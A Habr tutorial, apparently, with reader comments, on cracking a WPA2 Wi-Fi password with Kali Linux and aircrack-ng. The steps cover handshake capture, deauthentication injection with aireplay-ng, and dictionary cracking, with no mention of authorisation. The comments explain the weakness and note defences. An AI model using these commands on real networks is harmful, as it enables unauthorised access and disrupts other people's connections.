![](https://habrastorage.org/webt/qp/mj/cd/qpmjcdjop6j9zqvlws7hryujuva.jpeg)
Статья написана исключительно в ознакомительных целях
Аппаратное и программное обеспечение
Я буду пользоваться дистрибутивом Kali Linux, установленным на VMware Workstation.
Кроме того, в моём распоряжении имеется Wi-Fi-адаптер Alfa AWUS036NH 2000mW 802.11b/g/n. Вот его основные характеристики:
- Стандарты: IEEE 802.11b/g/n, USB 2.0.
- Скорости передачи данных: 802.11b — 11 Мбит/с, 802.11g — 54 Мбит/с, 802.11n — 150 Мбит/с.
- Разъём для подключения антенны: 1 x RP-SMA.
- Частотные диапазоны: 2412~2462 МГц, 2412~2472 МГц, 2412~2484 МГц.
- Питание: 5В.
- Безопасность: WEP 64/128, поддержка 802.1X, WPS, WPA-PSK, WPA2.
Шаг 1
Нужно запустить Kali Linux в VMware и подключить к системе Wi-Fi-адаптер Alfa AWUS036NH, выполнив следующую последовательность действий:
VM > Removable Devices > Ralink 802.11n USB Wireless Lan Card > Connect
![](https://habrastorage.org/getpro/habr/post_images/cf1/f7b/1e4/cf1f7b1e485509412012b76b5402c048.png)
Подключение Wi-Fi-адаптера к ОС, работающей в VMware
Шаг 2
Теперь обратите внимание на средства управления Wi-Fi-подключениями в Kali Linux.
![](https://habrastorage.org/getpro/habr/post_images/39a/885/f2a/39a885f2ad7d8c2dd278a54d136bb344.png)
Управление Wi-Fi-подключениями в Kali Linux
Шаг 3
Откройте терминал и выполните команду
airmon-ng
для вывода сведений об интерфейсах беспроводных сетей.![](https://habrastorage.org/getpro/habr/post_images/a1d/a92/7db/a1da927db678a772ac3d040c8f34f13a.png)
Вывод сведений об интерфейсах беспроводных сетей
Шаг 4
Как видно, интерфейсу назначено имя
wlan0
. Зная это, выполним в терминале команду airmon-ng start wlan0
. Благодаря этой команде Wi-Fi-адаптер будет переведён в режим мониторинга.![](https://habrastorage.org/getpro/habr/post_images/1c8/6b6/246/1c86b6246136df935e25652d2e37d0eb.png)
Перевод адаптера в режим мониторинга
Шаг 5
Теперь выполните такую команду:
airodump-ng wlan0mon
. Это позволит получить сведения о Wi-Fi-сетях, развёрнутых поблизости, о том, какие методы шифрования в них используются, а так же — о SSID.![](https://habrastorage.org/getpro/habr/post_images/158/f59/94b/158f5994b7947fe3782b7bb2f76ea439.png)
Сведения о Wi-Fi-сетях
Шаг 6
Теперь воспользуемся такой командой:
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
В ней
[channel]
надо заменить на номер целевого канала, [bssid]
— на целевой BSSID, [monitor interface]
— на интерфейс мониторинга wlan0mon
.В результате моя команда будет выглядеть так:
airodump-ng -c 6 –bssid 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ wlan0mon
![](https://habrastorage.org/getpro/habr/post_images/4ab/302/0f7/4ab3020f750219eb031375b424eb8afc.png)
Выполнение команды
Шаг 7
Теперь нужно подождать. Утилита
airodump
будет мониторить сеть, ожидая момента, когда кто-нибудь к ней подключится. Это даст нам возможность получить handshake-файлы, которые будут сохранены в папке /root/Desktop
.Вот как выглядит работа утилиты до того момента, как кто-то подключился к исследуемой сети.
![](https://habrastorage.org/getpro/habr/post_images/3e6/e43/622/3e6e436221074a096c19f542c3b2d773.png)
Программа наблюдает за сетью
А вот что происходит после того, как то-то к сети подключился, и программе удалось получить нужные данные.
![](https://habrastorage.org/getpro/habr/post_images/5a3/132/79c/5a313279c390e9baeea5a2e78a2d3081.png)
Получение необходимых данных
Шаг 8
Вы можете пропустить этот шаг в том случае, если у вас уже есть handshake-файлы. Здесь описан альтернативный способ получения соответствующих данных.
Речь идёт об использовании следующей команды:
aireplay-ng -0 2 -a [router bssid] -c [client bssid] wlan0mon
Здесь
[router bssid]
нужно заменить на BSSID Wi-Fi-сети, а [client bssid]
— на идентификатор рабочей станции.Эта команда позволяет получить handshake-данные в том случае, если вам не хочется ждать момента чьего-либо подключения к сети. Фактически, эта команда атакует маршрутизатор, выполняя внедрение пакетов. Параметр
-0 2
можно заменить другим числом, например, указать тут число 50, или большее число, и дождаться получения handshake-данных![](https://habrastorage.org/getpro/habr/post_images/d60/690/ac1/d60690ac1f0dc3271f76a4bfed9eeced.png)
Использование утилиты aireplay-bg
Шаг 9
Теперь воспользуемся такой командой:
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
-a2
означает WPA.-b
— это BSSID сети.-w
— это путь к списку паролей.*.cap
— это шаблон имён файлов, содержащих пароли.
В моём случае эта команда выглядит так:
aircrack-ng -a2 -b 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ww.txt /root/Desktop/*.cap
После выполнения этой команды начнётся процесс взлома пароля. Если пароль будет успешно взломан — вы увидите что-то, похожее на следующий скриншот.
![](https://habrastorage.org/getpro/habr/post_images/214/6e6/6b8/2146e66b89f5fbc1549e7c04d0c76a5b.png)
Успешный взлом пароля
Как вы контролируете безопасность своих беспроводных сетей?
![](https://habrastorage.org/webt/8x/zq/bh/8xzqbhb0at3_pjylb5c4366w_t8.png)
![](https://habrastorage.org/webt/ou/g5/kh/oug5kh6sjydt9llengsiebnp40w.png)
Zolg
Бьём в бубен здесь, здесь и ещё по краю.
В смысле 'запускаем магические утилиты' без объяснения сути происходящего и метода раскрыться пароля
M_AJ
При том, что на Хабре уже много лет как я замечательная серия из трех статей от ProgerXP
apevzner
Метод раскрытия пароля заключается, грубо говоря, в том, что WPA/PSK (PSK — pre-shared key, т.е. пароль) гоняет по сети в открытом виде криптохеш от пароля. Не какой-нибудь там стандартный SHA-256, а специфическую для WiFi функцию, но это и не важно, поскольку функция не секретна.
Поскольку пароль у большинства пользователей представляет собой что-нибудь вроде «kvartira356», то простым перебором он берется. При этом, что характерно, к точке доступа в процессе взлома никто не лезет, поэтому защититься она никак не может.
WPA/Radius этой уязвимостью не страдает, но настроить его заметно сложнее, и обычно никто не заморачивается.
Loggus66
Ещё как лезут, для deauth. В домах, где завёлся кулхацкер, это бесит. Но по меньшей мере становится понятно, что лучше бы перепроверить устойчивость паролей.
apevzner
По-моему, разумнее всего не считать WiFi локальной сетью (сетью, заслуживающей доверия). Тогда взломают и взломают, риск на самом деле не велик. Тарифы то, поди, у всех давно безлимитные.
nitro80
Взломают и с вашего ip начнут про власти писать гадости.
А вам потом придётся доказывать, что это не вы.
apevzner
Теоретически могут, конечно. Но практически, шанс сломать шею, упав с кровати, выше.
dartraiden
Так deauth достаточно выполнить всего один раз, чтобы словить хэндшейк. А можно даже и без этого обойтись.
Если же кто-то отстреливает клиентов постоянно из чистой вредности, то PMF в помощь.